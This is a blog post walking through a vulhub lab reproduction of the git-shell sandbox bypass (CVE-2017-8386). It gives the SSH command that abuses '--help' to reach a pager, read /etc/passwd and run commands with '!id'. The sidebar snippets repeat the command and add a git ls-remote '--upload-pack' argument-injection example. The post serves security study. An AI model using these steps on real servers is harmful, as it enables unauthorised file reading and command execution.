GIT-SHELL 沙盒绕过(CVE-2017-8386)

最新推荐文章于 2024-08-02 16:59:58 发布
最新推荐文章于 2024-08-02 16:59:58 发布
阅读量280 收藏 1
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117629241
版权

漏洞背景

Git是美国软件开发者林纳斯-托瓦兹(Linus Torvalds)所研发的一套免费、开源的分布式版本控制系统。git-shell是一个命令行工具。 Git中的git-shell存在安全漏洞。远程攻击者可借助以破折号字符开头的储存库名称利用该漏洞获取权限。

影响版本

  • 2.4.12之前的版本
  • 2.5.6之前的2.5.x版本
  • 2.6.7之前的2.6.x版本
  • 2.7.5之前的2.7.x版本
  • 2.8.5之前的2.8.x版本
  • 2.9.4之前的2.9.x版本
  • 2.10.3之前的2.10.x版本
  • 2.11.2之前的2.11.x版本
  • 2.12.3之前的2.12.x版本

漏洞原理

原理这里就不多赘述,详细需要看:https://vulhub.org/#/environments/git/CVE-2017-8386/
想要对这个漏洞有一定理解,强烈建议看原理,上面这篇文章写的也简单易懂,十分好理解!

漏洞复现

我使用vulhub的环境,ssh端口为3322,目录下有id_rsa私钥文件,需要给予0600权限,以免连接失败。
正常连接ssh会给git-shell拦截,不返回shell,我们使用--help技巧,进入help界面。

ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'"

接着按下shift+e,输入文件绝对路径,即可读取任意文件,我这里输入了/etc/passwd
在这里插入图片描述
输入在help界面输入!id,还能够执行命令:
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Vulnhub复现漏洞 - GIT-SHELL 沙盒绕过CVE-2017-8386
JiangBuLiu的博客
07-08 975
GIT-SHELL 沙盒绕过CVE-2017-8386)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现原理基于ssh协议的git拉取流程如何禁止git用户执行系统shellgit-shell 沙盒绕过漏洞(CVE-2017-8386)通过ssh进行利用一些限制 Vulnhub官方复现教程 https://vulhub.org/#/environments/git/CVE-2017-8...
git CVE-2017-8386
weixin_37639863的博客
02-18 749
GIT-SHELL 沙盒绕过CVE-2017-8386)_黑白的博客-CSDN博客声明好好学习,天天向上漏洞描述GIT-SHELL 沙盒绕过CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。影响范围复现过程使用vulhub/app/vulhub-master/git/CVE-2017-8386使用docker启动docker-compose builddocker-compose up -d先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compos
CVE-2017-8386 git沙盒绕过
m0_46580995的博客
10-17 485
vulhub的cve-2017-8386 sudo ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'" shift+e !+命令
【vulhub】GIT-SHELL 沙盒绕过CVE-2017-8386)漏洞复现
qq_45300786的博客
04-16 447
通过此命令达到文艺文件读取 ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'" 输入上图的ssh命令后,在这个界面同时按shift键和e键 然后输入想查看的文件 /etc/passwd 详细文章请参考 https://blog.csdn.net/m0_46580995/article/details/109136159 https://vulhub.org/#/environments/git/CVE-2017
git-openssl-shellscript:Shellscript用OpenSSL编译git
02-03
这个"git-openssl-shellscript"项目显然就是为了解决这样的需求。 首先,我们来看一下如何用Shell脚本来编译Git。在Unix-like系统中,Shell脚本是一种自动化任务的工具,它允许用户编写一系列命令并一次性执行。...
Git-2.39.1-64-bit
02-10
Git for Windows focuses on offering a lightweight, native set of tools that bring the full feature set of the Git SCM to Windows while providing appropriate user interfaces for experienced Git users ...
git-sandbox:git-沙盒
04-30
厨师回购所有安装都需要一个称为Chef-repo的中央工作区。 在这里可以存储和管理原始对象(食谱,角色,环境,数据包和Chef-repo配置文件)。 Chef-repo应该保留在版本控制下,例如 ,然后进行管理,就好像它是源代码...
git-2.41.0-64-bit window版本
06-02
Git-2.41.0-64-bit window版本是针对Windows操作系统的一个特定构建,提供64位架构的支持。这个版本的发布,意味着用户可以在Windows环境下享受到Git的最新功能和性能优化。 Git的核心特性包括: 1. 分布式:每个...
(64位)Git-2.44安装包
02-27
Git-2.44.0-64-bit.exe是适用于64位操作系统的Git的最新安装包,它提供了对Windows平台的强大支持。在这个版本中,Git团队引入了一系列更新和改进,以确保用户能够获得最佳的版本控制体验。 首先,让我们深入了解...
CVE-2017-8386_ GIT-SHELL 漏洞复现(vulhub)
MDSEC的博客
08-23 271
GIT (分布式版本控制系统),是一个开源的分布式版本控制系统,可以有效、高速地处理从很小到非常大的项目版本管理。也是Linus Torvalds为了帮助管理Linux内核开发而开发的一个开放源码的版本控制软件。GIT-SHELL 沙盒绕过CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。按住shife+e 输入你想要查看的文件 ,就可以查看文件。然后查看CVE-2017-8386下的文件。老样子,首先拉去镜像环境。执行chmod,修改属性。这样漏洞就复现完成了。
Git中的有个致命的远程执行漏洞
weixin_34244102的博客
11-07 131
2019独角兽企业重金招聘Python工程师标准>>> ...
git参数注入
公众号shadow sock7
09-30 800
向前一段时间出的Jenkins的git client插件的RCE(CVE-2019-10392)就是git ls-remote命令拼接导致的命令执行。 然后找了一些git的命令注入的例子: git-ls-remote git ls-remote -h --upload-pack=calc.exe HEAD 这个也是git-ls-remote命令的参数注入漏洞: https://snyk.io/...
利用Vulnhub复现漏洞 - Gitlab 任意文件读取漏洞(CVE-2016-9086)
JiangBuLiu的博客
07-08 3311
Gitlab 任意文件读取漏洞(CVE-2016-9086)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/gitlab/CVE-2016-9086/ 漏洞原理 Gitlab版本:8.13.1 原理剖析:http://paper.seebug.org/104/ 复现漏洞 启动环境 https...
带妹玩转Vulnhub【二】
BadRer的博客
09-27 1080
前言 今天还是没有妹子主动来找我,一怒之下再写一篇,以此祭天!哼!QAQ 带妹是不可能带妹的,这辈子都不可能带妹的
写给想要学习渗透的小朋友
JiangBuLiu的博客
07-03 514
还是花钱培训吧图片版本初级中级高级实战文字版网络安全基础篇网络安全进阶篇网络安全专业篇网络安全专业篇 自学是不可能自学的,培训就是VIP人民币玩家噜!
CVE-2015-1427(Groovy 沙盒绕过 && 代码执行漏洞)
浅笑996的博客
11-22 1940
1、vulhub环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 2、启动docker环境 cd vulhub-master/elasticsearch/CVE-2015-1427/ sudo docker-compose up 3、访问目标的9200,会出现Elasticsearch的信息: 新版本中Elastic...
如何用ssh隧道绕过防火墙
代码研究院
11-23 5654
转载自:苦丁山的博客故事背景 前几天,公司为了加强网络安全,来了个新规定,员工不能直接从自己的电脑连通公司的其他电脑。需要连通那些电脑的话,必须先登录一个 jumpbox,也就是一个中转电脑,然后才能从这个中转电脑去别的地方。 然后,因为这是个中转电脑,是全公司的人共用的通道,而且只是个通道,没打算让您干别的,所以这个中转电脑容量有限,派给每个用户的权限也很低,很多指令不能在上面运行
鸿蒙系统开发【加解密算法库框架】安全
最新发布
2301_76813281的博客
08-02 827
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
git-flow:一种成功的Git分支模型解析
"git-flow是一个基于Git的分支管理模型,由Vincent Driessen提出,旨在帮助团队更有效地协作和管理项目。它定义了特定的分支策略和工作流程,以支持软件开发的不同阶段,包括功能开发、预发布、发布和维护。在本次...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值